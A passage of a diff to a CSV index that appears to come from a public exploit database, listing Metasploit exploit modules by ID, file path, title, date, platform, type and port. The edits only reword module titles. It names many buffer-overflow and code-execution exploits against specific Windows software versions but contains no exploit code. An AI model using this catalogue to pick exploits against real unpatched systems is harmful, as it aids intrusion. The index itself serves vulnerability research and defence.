Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 +16484,platforms/windows/remote/16484.rb,"Mercury/32 Mail Server 4.01a - IMAP RENAME Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16485,platforms/windows/remote/16485.rb,"MailEnable IMAPD 1.54 - STATUS Request Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16486,platforms/windows/remote/16486.rb,"Novell NetMail 3.52d - IMAP Authenticate Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 -16487,platforms/windows/remote/16487.rb,"Ipswitch IMail - IMAP SEARCH Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 +16487,platforms/windows/remote/16487.rb,"Ipswitch IMail Server - IMAP SEARCH Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16488,platforms/windows/remote/16488.rb,"Novell NetMail 3.52d - IMAP APPEND Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16489,platforms/windows/remote/16489.rb,"RealVNC 3.3.7 - Client Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16490,platforms/windows/remote/16490.rb,"UltraVNC 1.0.1 - Client Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 @@ -14337,7 +14337,7 @@ id,file,description,date,author,platform,type,port 16522,platforms/windows/remote/16522.rb,"Yahoo! Messenger - 'YVerInfo.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16523,platforms/windows/remote/16523.rb,"Novell iPrint Client - ActiveX Control target-frame Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16524,platforms/windows/remote/16524.rb,"AwingSoft Winds3D Player - SceneURL Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 -16525,platforms/windows/remote/16525.rb,"AOL Instant Messenger - goaway Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 +16525,platforms/windows/remote/16525.rb,"AOL Instant Messenger AIM - goaway Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 16526,platforms/windows/remote/16526.rb,"Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)",2010-08-12,Metasploit,windows,remote,0 16527,platforms/windows/remote/16527.rb,"Apple QuickTime 7.1.3 - RTSP URI Buffer Overflow (Metasploit)",2010-05-04,Metasploit,windows,remote,0 16528,platforms/windows/remote/16528.rb,"Symantec Altiris Deployment Solution - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 @@ -14349,10 +14349,10 @@ id,file,description,date,author,platform,type,port 16534,platforms/windows/remote/16534.rb,"AtHocGov IWSAlerts - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 16535,platforms/windows/remote/16535.rb,"Trend Micro OfficeScan - Client ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16536,platforms/windows/remote/16536.rb,"Green Dam - URL Processing Buffer Overflow (Metasploit)",2010-03-10,Metasploit,windows,remote,0 -16537,platforms/windows/remote/16537.rb,"Microsoft OWC Spreadsheet - msDataSourceObject Memory Corruption (Metasploit)",2010-07-20,Metasploit,windows,remote,0 +16537,platforms/windows/remote/16537.rb,"Microsoft Office Web Components (OWC) Spreadsheet - msDataSourceObject Memory Corruption (Metasploit)",2010-07-20,Metasploit,windows,remote,0 16538,platforms/windows/remote/16538.rb,"McAfee Visual Trace - ActiveX Control Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16539,platforms/windows/remote/16539.rb,"Creative Software AutoUpdate Engine - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 -16540,platforms/windows/remote/16540.rb,"Zenturi ProgramChecker - ActiveX Control Arbitrary File Download (Metasploit)",2010-11-24,Metasploit,windows,remote,0 +16540,platforms/windows/remote/16540.rb,"Zenturi ProgramChecker ActiveX - Control Arbitrary File Download (Metasploit)",2010-11-24,Metasploit,windows,remote,0 16541,platforms/windows/remote/16541.rb,"Microsoft Internet Explorer - Winhlp32.exe MsgBox Code Execution (Metasploit)",2010-09-28,Metasploit,windows,remote,0 16542,platforms/windows/remote/16542.rb,"Microsoft OWC Spreadsheet - HTMLURL Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16543,platforms/windows/remote/16543.rb,"Novell iPrint Client - ActiveX Control Date/Time Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 @@ -14375,9 +14375,9 @@ id,file,description,date,author,platform,type,port 16560,platforms/windows/remote/16560.rb,"Autodesk IDrop - ActiveX Control Heap Memory Corruption (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16561,platforms/windows/remote/16561.rb,"Microsoft Internet Explorer - COM CreateObject Code Execution (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16562,platforms/windows/local/16562.rb,"Apple iTunes 4.7 - Playlist Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,local,0 -16563,platforms/windows/remote/16563.rb,"Tumbleweed FileTransfer - 'vcst_eu.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 +16563,platforms/windows/remote/16563.rb,"Tumbleweed SecureTransport FileTransfer - 'vcst_eu.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16564,platforms/windows/remote/16564.rb,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit) (2)",2010-07-03,Metasploit,windows,remote,0 -16565,platforms/windows/remote/16565.rb,"RKD Software 'BarCodeAx.dll' 4.9 - ActiveX Remote Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 +16565,platforms/windows/remote/16565.rb,"RKD Software BarCode ActiveX Control 'BarCodeAx.dll' 4.9 - Remote Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16566,platforms/windows/remote/16566.rb,"CommuniCrypt Mail 1.16 - SMTP ActiveX Stack Buffer Overflow (Metasploit)",2010-07-26,Metasploit,windows,remote,0 16567,platforms/windows/remote/16567.rb,"Microsoft Internet Explorer - Tabular Data Control ActiveX Memory Corruption (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16568,platforms/windows/remote/16568.rb,"Juniper SSL-VPN IVE - 'JuniperSetupDLL.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 @@ -14398,7 +14398,7 @@ id,file,description,date,author,platform,type,port 16583,platforms/windows/remote/16583.rb,"Microsoft Internet Explorer - Data Binding Memory Corruption (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16584,platforms/windows/remote/16584.rb,"RealPlayer - 'rmoc3260.dll' ActiveX Control Heap Corruption (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16585,platforms/windows/remote/16585.rb,"Sun Java - Web Start Plugin Command Line Argument Injection (Metasploit)",2010-09-21,Metasploit,windows,remote,0 -16586,platforms/windows/remote/16586.rb,"RealNetworks RealPlayer - SMIL Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 +16586,platforms/windows/remote/16586.rb,"RealNetworks RealPlayer - '.SMIL' Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16587,platforms/windows/remote/16587.rb,"Sun Java - Runtime New Plugin docbase Buffer Overflow (Metasploit)",2011-01-08,Metasploit,windows,remote,0 16588,platforms/windows/remote/16588.rb,"HP LoadRunner 9.0 - ActiveX AddFolder Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16589,platforms/windows/local/16589.rb,"Apple QuickTime 7.6.7 - _Marshaled_pUnk Code Execution (Metasploit)",2011-01-08,Metasploit,windows,local,0 @@ -14406,17 +14406,17 @@ id,file,description,date,author,platform,type,port 16591,platforms/windows/remote/16591.rb,"AOL Radio AmpX - ActiveX Control ConvertFile() Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16592,platforms/windows/remote/16592.rb,"SoftArtisans XFile FileManager - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16593,platforms/windows/local/16593.rb,"Adobe - JBIG2Decode Memory Corruption (1)",2010-06-15,Metasploit,windows,local,0 -16594,platforms/windows/remote/16594.rb,"Adobe Shockwave - rcsL Memory Corruption (Metasploit)",2010-10-22,Metasploit,windows,remote,0 +16594,platforms/windows/remote/16594.rb,"Adobe Shockwave Player - rcsL Memory Corruption (Metasploit)",2010-10-22,Metasploit,windows,remote,0 16595,platforms/windows/remote/16595.rb,"Norton AntiSpam 2004 - SymSpamHelper ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16596,platforms/windows/remote/16596.rb,"Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (1)",2010-10-04,Metasploit,windows,remote,0 -16597,platforms/windows/remote/16597.rb,"Microsoft Internet Explorer - VML Fill Method Code Execution (Metasploit)",2010-07-03,Metasploit,windows,remote,0 +16597,platforms/windows/remote/16597.rb,"Microsoft Internet Explorer - (VML) Fill Method Code Execution (Metasploit)",2010-07-03,Metasploit,windows,remote,0 16598,platforms/windows/remote/16598.rb,"Persits XUpload - ActiveX MakeHttpRequest Directory Traversal (Metasploit)",2010-11-11,Metasploit,windows,remote,0 16599,platforms/windows/remote/16599.rb,"Microsoft Internet Explorer - 'Aurora' Memory Corruption (Metasploit)",2010-07-12,Metasploit,windows,remote,0 16600,platforms/windows/remote/16600.rb,"Symantec Altiris Deployment Solution - ActiveX Control Arbitrary File Download and Execute (Metasploit)",2010-11-24,Metasploit,windows,remote,0 16601,platforms/windows/remote/16601.rb,"FlipViewer FViewerLoading - ActiveX Control Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16602,platforms/windows/remote/16602.rb,"Macrovision Installshield Update Service - ActiveX Unsafe Method (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16603,platforms/windows/remote/16603.rb,"NCTAudioFile2 2.x - ActiveX Control SetFormatLikeSample() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 -16604,platforms/windows/remote/16604.rb,"WebEx UCF - 'atucfobj.dll' ActiveX NewObject Method Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 +16604,platforms/windows/remote/16604.rb,"Cisco WebEx Meeting Manager UCF - 'atucfobj.dll' ActiveX NewObject Method Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16605,platforms/windows/remote/16605.rb,"Snapshot Viewer for Microsoft Access - ActiveX Control Arbitrary File Download (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16606,platforms/windows/local/16606.rb,"Adobe - Collab.getIcon() Buffer Overflow (1)",2010-04-30,Metasploit,windows,local,0 16607,platforms/windows/remote/16607.rb,"WinZip FileView - (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 @@ -14444,7 +14444,7 @@ id,file,description,date,author,platform,type,port 16629,platforms/windows/local/16629.rb,"VideoLAN VLC Media Player - TiVo Buffer Overflow (Metasploit)",2011-02-02,Metasploit,windows,local,0 16630,platforms/windows/remote/16630.rb,"CA eTrust PestPatrol - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 16631,platforms/windows/local/16631.rb,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (3)",2010-09-25,Metasploit,windows,local,0 -16632,platforms/windows/local/16632.rb,"ACDSee - XPM File Section Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0 +16632,platforms/windows/local/16632.rb,"ACDSee - '.XPM' File Section Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0 16633,platforms/windows/local/16633.rb,"Steinberg MyMP3Player 3.0 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0 16634,platforms/windows/local/16634.rb,"Free Download Manager - Torrent Parsing Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0 16635,platforms/windows/remote/16635.rb,"activePDF WebGrabber - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 @@ -14458,7 +14458,7 @@ id,file,description,date,author,platform,type,port 16643,platforms/windows/local/16643.rb,"SafeNet SoftRemote - GROUPNAME Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0 16644,platforms/windows/local/16644.rb,"VariCAD 2010-2.05 EN - '.DWB' Stack Buffer Overflow (Metasploit)",2010-04-05,Metasploit,windows,local,0 16645,platforms/windows/local/16645.rb,"URSoft W32Dasm 8.93 - Disassembler Function Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0 -16646,platforms/windows/local/16646.rb,"HT-MP3Player 1.0 HT3 - File Parsing Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0 +16646,platforms/windows/local/16646.rb,"HT-MP3Player 1.0 - '.HT3' File Parsing Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0 16647,platforms/windows/remote/16647.rb,"EMC ApplicationXtender (KeyWorks) - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 16648,platforms/windows/local/16648.rb,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (2)",2010-09-25,Metasploit,windows,local,0 16649,platforms/windows/remote/16649.rb,"Microsoft Works 7 - 'WkImgSrv.dll' WKsPictureInterface() ActiveX Exploit (Metasploit)",2010-09-25,Metasploit,windows,remote,0 @@ -14466,14 +14466,14 @@ id,file,description,date,author,platform,type,port 16651,platforms/windows/local/16651.rb,"AOL 9.5 - Phobos.Playlist Import() Stack Based Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0 16652,platforms/windows/local/16652.rb,"Adobe - FlateDecode Stream Predictor 02 Integer Overflow (2)",2010-09-25,Metasploit,windows,local,0 16653,platforms/windows/local/16653.rb,"Xion Audio Player 1.0.126 - Unicode Stack Buffer Overflow (Metasploit)",2010-12-16,Metasploit,windows,local,0 -16654,platforms/windows/local/16654.rb,"Orbital Viewer - ORB File Parsing Buffer Overflow (Metasploit)",2010-03-09,Metasploit,windows,local,0 +16654,platforms/windows/local/16654.rb,"Orbital Viewer - '.ORB' File Parsing Buffer Overflow (Metasploit)",2010-03-09,Metasploit,windows,local,0 16655,platforms/windows/local/16655.rb,"ProShow Gold 4.0.2549 - '.psh' Stack Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0 16656,platforms/windows/local/16656.rb,"Altap Salamander 2.5 PE Viewer - Buffer Overflow (Metasploit)",2010-12-16,Metasploit,windows,local,0 16657,platforms/aix/dos/16657.rb,"PointDev IDEAL Migration - Buffer Overflow (Metasploit)",2010-09-25,Metasploit,aix,dos,0 16658,platforms/windows/local/16658.rb,"VUPlayer - '.cue' Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0 16659,platforms/aix/local/16659.rb,"Cain & Abel 4.9.24 - RDP Buffer Overflow (Metasploit)",2010-11-24,Metasploit,aix,local,0 16660,platforms/windows/local/16660.rb,"Microsoft Windows - CreateSizedDIBSECTION Stack Buffer Overflow (Metasploit)",2011-02-08,Metasploit,windows,local,0 -16661,platforms/windows/local/16661.rb,"Audio Workstation 6.4.2.4.3 - pls Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0 +16661,platforms/windows/local/16661.rb,"Audio Workstation 6.4.2.4.3 - '.pls' Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0 16662,platforms/windows/local/16662.rb,"A-PDF WAV to MP3 1.0.0 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0 16663,platforms/windows/local/16663.rb,"S.O.M.P.L 1.0 Player - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0 16664,platforms/windows/local/16664.rb,"gAlan 0.2.1 - Buffer Overflow (2)",2010-09-25,Metasploit,windows,local,0 @@ -14502,12 +14502,12 @@ id,file,description,date,author,platform,type,port 16687,platforms/windows/local/16687.rb,"Adobe Flash Player - 'newfunction' Invalid Pointer Use (2)",2010-09-25,Metasploit,windows,local,0 16688,platforms/windows/local/16688.rb,"Zinf Audio Player 2.2.1 - '.pls' Stack Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,local,0 16689,platforms/windows/remote/16689.rb,"CCProxy 6.2 - Telnet Proxy Ping Overflow (2) (Metasploit)",2010-04-30,Metasploit,windows,remote,23 -16690,platforms/windows/remote/16690.rb,"Qbik WinGate WWW Proxy Server - URL Processing Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,80 +16690,platforms/windows/remote/16690.rb,"QBik WinGate WWW Proxy Server - URL Processing Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,80 16691,platforms/windows/remote/16691.rb,"Blue Coat WinProxy - Host Header Overflow (Metasploit)",2010-07-12,Metasploit,windows,remote,80 16692,platforms/windows/remote/16692.rb,"Proxy-Pro Professional GateKeeper 4.7 - GET Request Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,3128 16693,platforms/windows/remote/16693.rb,"Unreal Tournament 2004 (Windows) - 'secure' Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,7787 16694,platforms/windows/remote/16694.rb,"Racer 0.5.3 Beta 5 - Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,26000 -16695,platforms/windows/remote/16695.rb,"Medal Of Honor Allied Assault - getinfo Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,12203 +16695,platforms/windows/remote/16695.rb,"Medal of Honor Allied Assault - getinfo Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,12203 16696,platforms/windows/remote/16696.rb,"IBM Lotus Domino Sametime - STMux.exe Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,1533 16697,platforms/windows/remote/16697.rb,"IBM Lotus Domino Web Server - Accept-Language Stack Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,80 16698,platforms/windows/remote/16698.rb,"Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)",2010-09-20,Metasploit,windows,remote,0 @@ -14525,11 +14525,11 @@ id,file,description,date,author,platform,type,port 16710,platforms/windows/remote/16710.rb,"Trellian FTP Client 3.01 - PASV Remote Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16711,platforms/windows/remote/16711.rb,"EasyFTP Server 1.7.0.11 - MKD Command Stack Buffer Overflow (Metasploit)",2010-07-27,Metasploit,windows,remote,0 16712,platforms/windows/remote/16712.rb,"BolinTech Dream FTP Server 1.02 - Format String (Metasploit)",2010-06-22,Metasploit,windows,remote,21 -16713,platforms/windows/remote/16713.rb,"Cesar FTP 0.99g - (MKD) Command Buffer Overflow (Metasploit)",2011-02-23,Metasploit,windows,remote,0 +16713,platforms/windows/remote/16713.rb,"CesarFTP 0.99g - (MKD) Command Buffer Overflow (Metasploit)",2011-02-23,Metasploit,windows,remote,0 16714,platforms/windows/remote/16714.rb,"Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,2100 -16715,platforms/windows/remote/16715.rb,"Serv-U FTPD - MDTM Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,21 +16715,platforms/windows/remote/16715.rb,"RhinoSoft Serv-U FTPd Server - MDTM Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,21 16716,platforms/windows/remote/16716.rb,"Odin Secure FTP 4.1 - Stack Buffer Overflow (LIST)",2010-11-14,Metasploit,windows,remote,0 -16717,platforms/windows/remote/16717.rb,"Ipswitch WS_FTP Server 5.05 - XMD5 Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 +16717,platforms/windows/remote/16717.rb,"Ipswitch WS_FTP Server 5.05 - (XMD5) Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16718,platforms/windows/remote/16718.rb,"Xlink FTP Server - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 16719,platforms/windows/remote/16719.rb,"Ipswitch WS_FTP Server 5.03 - MKD Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,21 16720,platforms/windows/remote/16720.rb,"FTP Synchronizer Professional 4.0.73.274 - Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,0 @@ -14542,10 +14542,10 @@ id,file,description,date,author,platform,type,port 16727,platforms/windows/remote/16727.rb,"Sasser Worm avserve - FTP PORT Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,5554 16728,platforms/windows/remote/16728.rb,"Gekko Manager FTP Client - Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,0 16729,platforms/windows/remote/16729.rb,"SlimFTPd - LIST Concatenation Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0 -16730,platforms/windows/remote/16730.rb,"3Com 3CDaemon 2.0 FTP - 'Username' Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 +16730,platforms/windows/remote/16730.rb,"3Com 3CDaemon 2.0 FTP Server - 'Username' Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16731,platforms/win_x86/remote/16731.rb,"Oracle 9i XDB (Windows x86) - FTP PASS Overflow (Metasploit)",2010-04-30,Metasploit,win_x86,remote,0 16732,platforms/windows/remote/16732.rb,"httpdx - tolog() Function Format String (1)",2010-08-25,Metasploit,windows,remote,0 -16733,platforms/windows/remote/16733.rb,"FileCopa FTP Server pre 18 Jul Version - Exploit (Metasploit)",2010-04-30,Metasploit,windows,remote,21 +16733,platforms/windows/remote/16733.rb,"FileCOPA FTP Server (Pre 18 Jul Version) - Exploit (Metasploit)",2010-04-30,Metasploit,windows,remote,21 16734,platforms/windows/remote/16734.rb,"EasyFTP Server 1.7.0.11 - LIST Command Stack Buffer Overflow (Metasploit)",2010-08-03,Metasploit,windows,remote,0 16735,platforms/windows/remote/16735.rb,"NetTerm NetFTPD - USER Buffer Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0 16736,platforms/windows/remote/16736.rb,"FTPShell 5.1 - Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,0 @@ -14558,17 +14558,17 @@ id,file,description,date,author,platform,type,port 16743,platforms/windows/remote/16743.rb,"32bit FTP Client - Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,0 16744,platforms/windows/remote/16744.rb,"Computer Associates License Client - GETCONFIG Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,10203 16745,platforms/windows/remote/16745.rb,"Computer Associates License Server - GETCONFIG Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,10202 -16746,platforms/windows/remote/16746.rb,"SentinelLM - UDP Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,5093 +16746,platforms/windows/remote/16746.rb,"Sentinel LM - UDP Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,5093 16747,platforms/windows/remote/16747.rb,"Microsoft Message Queueing Service - Path Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,2103 16748,platforms/windows/remote/16748.rb,"Microsoft DNS RPC Service - extractQuotedChar() Overflow (TCP)",2010-07-25,Metasploit,windows,remote,0 16749,platforms/windows/remote/16749.rb,"Microsoft RPC DCOM Interface - Overflow Exploit (Metasploit)",2011-01-11,Metasploit,windows,remote,0 16750,platforms/windows/remote/16750.rb,"Microsoft Message Queueing Service - DNS Name Path Overflow (Metasploit)",2010-07-25,Metasploit,windows,remote,0 16751,platforms/win_x86/remote/16751.rb,"SHOUTcast DNAS/Win32 1.9.4 - File Request Format String Overflow (Metasploit)",2010-04-30,Metasploit,win_x86,remote,0 -16752,platforms/windows/remote/16752.rb,"Apache module Mod_Rewrite - LDAP protocol Buffer Overflow (Metasploit)",2010-02-15,Metasploit,windows,remote,80 -16753,platforms/windows/remote/16753.rb,"Xitami 2.5c2 Web Server - If-Modified-Since Overflow (Metasploit)",2010-08-25,Metasploit,windows,remote,80 +16752,platforms/windows/remote/16752.rb,"Apache (mod_rewrite) - LDAP protocol Buffer Overflow (Metasploit)",2010-02-15,Metasploit,windows,remote,80 +16753,platforms/windows/remote/16753.rb,"Xitami Web Server 2.5c2 - If-Modified-Since Overflow (Metasploit)",2010-08-25,Metasploit,windows,remote,80 16754,platforms/windows/remote/16754.rb,"MiniShare 1.4.1 - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,80 16755,platforms/windows/remote/16755.rb,"Novell iManager - getMultiPartParameters Arbitrary File Upload (Metasploit)",2010-10-19,Metasploit,windows,remote,8080 -16756,platforms/windows/remote/16756.rb,"Sambar 6 - Search Results Buffer Overflow (Metasploit)",2010-02-13,Metasploit,windows,remote,80 +16756,platforms/windows/remote/16756.rb,"Sambar Server 6 - Search Results Buffer Overflow (Metasploit)",2010-02-13,Metasploit,windows,remote,80 16757,platforms/windows/remote/16757.rb,"Novell Messenger Server 2.0 - Accept-Language Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,8300 16758,platforms/windows/remote/16758.rb,"SAP DB 7.4 - WebTools Buffer Overflow (Metasploit)",2010-07-16,Metasploit,windows,remote,9999 16759,platforms/win_x86/remote/16759.rb,"SHTTPD 1.34 (Windows x86) - URI-Encoded POST Request Overflow (Metasploit)",2010-05-09,Metasploit,win_x86,remote,0 @@ -14579,14 +14579,14 @@ id,file,description,date,author,platform,type,port 16764,platforms/windows/remote/16764.rb,"IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (2)",2010-05-09,Metasploit,windows,remote,0 16765,platforms/windows/remote/16765.rb,"MaxDB WebDBM - Database Parameter Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,9999 16766,platforms/windows/remote/16766.rb,"Sybase EAServer 5.2 - Remote Stack Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,8080 -16767,platforms/windows/remote/16767.rb,"IA WebMail 3.x - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,80 +16767,platforms/windows/remote/16767.rb,"IA WebMail Server 3.x - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,80 16768,platforms/windows/remote/16768.rb,"Trend Micro OfficeScan - Remote Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16769,platforms/windows/remote/16769.rb,"eDirectory 8.7.3 - iMonitor Remote Stack Buffer Overflow (Metasploit)",2010-07-13,Metasploit,windows,remote,8008 -16770,platforms/windows/remote/16770.rb,"Savant 3.1 Web Server - Overflow Exploit (Metasploit)",2010-10-04,Metasploit,windows,remote,0 +16770,platforms/windows/remote/16770.rb,"Savant Web Server 3.1 - Overflow Exploit (Metasploit)",2010-10-04,Metasploit,windows,remote,0 16771,platforms/windows/remote/16771.rb,"EasyFTP Server 1.7.0.11 - list.html path Stack Buffer Overflow (Metasploit)",2010-08-17,Metasploit,windows,remote,8080 16772,platforms/windows/remote/16772.rb,"EFS Easy Chat Server - Authentication Request Handling Buffer Overflow (Metasploit)",2010-08-06,Metasploit,windows,remote,80 16773,platforms/windows/remote/16773.rb,"Novell eDirectory NDS Server - Host Header Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,8028 -16774,platforms/windows/remote/16774.rb,"HP OpenView NNM 7.53/7.51 - OVAS.exe Unauthenticated Stack Buffer Overflow (Metasploit)",2010-10-12,Metasploit,windows,remote,0 +16774,platforms/windows/remote/16774.rb,"HP OpenView Network Node Manager (OV NNM) 7.53/7.51 - OVAS.exe Unauthenticated Stack Buffer Overflow (Metasploit)",2010-10-12,Metasploit,windows,remote,0 16775,platforms/windows/remote/16775.rb,"RhinoSoft Serv-U FTP Server - Session Cookie Buffer Overflow (Metasploit)",2010-03-10,Metasploit,windows,remote,0 16776,platforms/windows/remote/16776.rb,"Alt-N WebAdmin - USER Buffer Overflow (Metasploit)",2010-02-15,Metasploit,windows,remote,0 16777,platforms/windows/remote/16777.rb,"Free Download Manager - Remote Control Server Buffer Overflow (Metasploit)",2010-07-13,Metasploit,windows,remote,80 @@ -14597,20 +14597,20 @@ id,file,description,date,author,platform,type,port 16782,platforms/windows/remote/16782.rb,"Apache (Windows x86) - (Windows x86) Chunked Encoding (Metasploit)",2010-07-07,Metasploit,windows,remote,0 16783,platforms/win_x86/remote/16783.rb,"McAfee ePolicy Orchestrator / ProtectionPilot - Overflow Exploit (Metasploit)",2010-09-20,Metasploit,win_x86,remote,0 16784,platforms/multiple/remote/16784.rb,"Novell ZENworks Configuration Management 10.2.0 - Remote Execution (1)",2010-11-22,Metasploit,multiple,remote,80 -16785,platforms/windows/remote/16785.rb,"Hewlett-Packard Power Manager Administration - Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,80 +16785,platforms/windows/remote/16785.rb,"Hewlett-Packard (HP) Power Manager Administration - Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,80 16786,platforms/windows/remote/16786.rb,"PeerCast 0.1216 (Windows x86) - URL Handling Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,7144 -16787,platforms/windows/remote/16787.rb,"Ipswitch WhatsUp Gold 8.03 - Buffer Overflow (Metasploit)",2010-07-14,Metasploit,windows,remote,0 +16787,platforms/windows/remote/16787.rb,"IPSwitch WhatsUp Gold 8.03 - Buffer Overflow (Metasploit)",2010-07-14,Metasploit,windows,remote,0 16788,platforms/cfm/webapps/16788.rb,"ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit)",2010-11-24,Metasploit,cfm,webapps,0 16789,platforms/multiple/remote/16789.rb,"Adobe RoboHelp Server 8 - Arbitrary File Upload / Execution 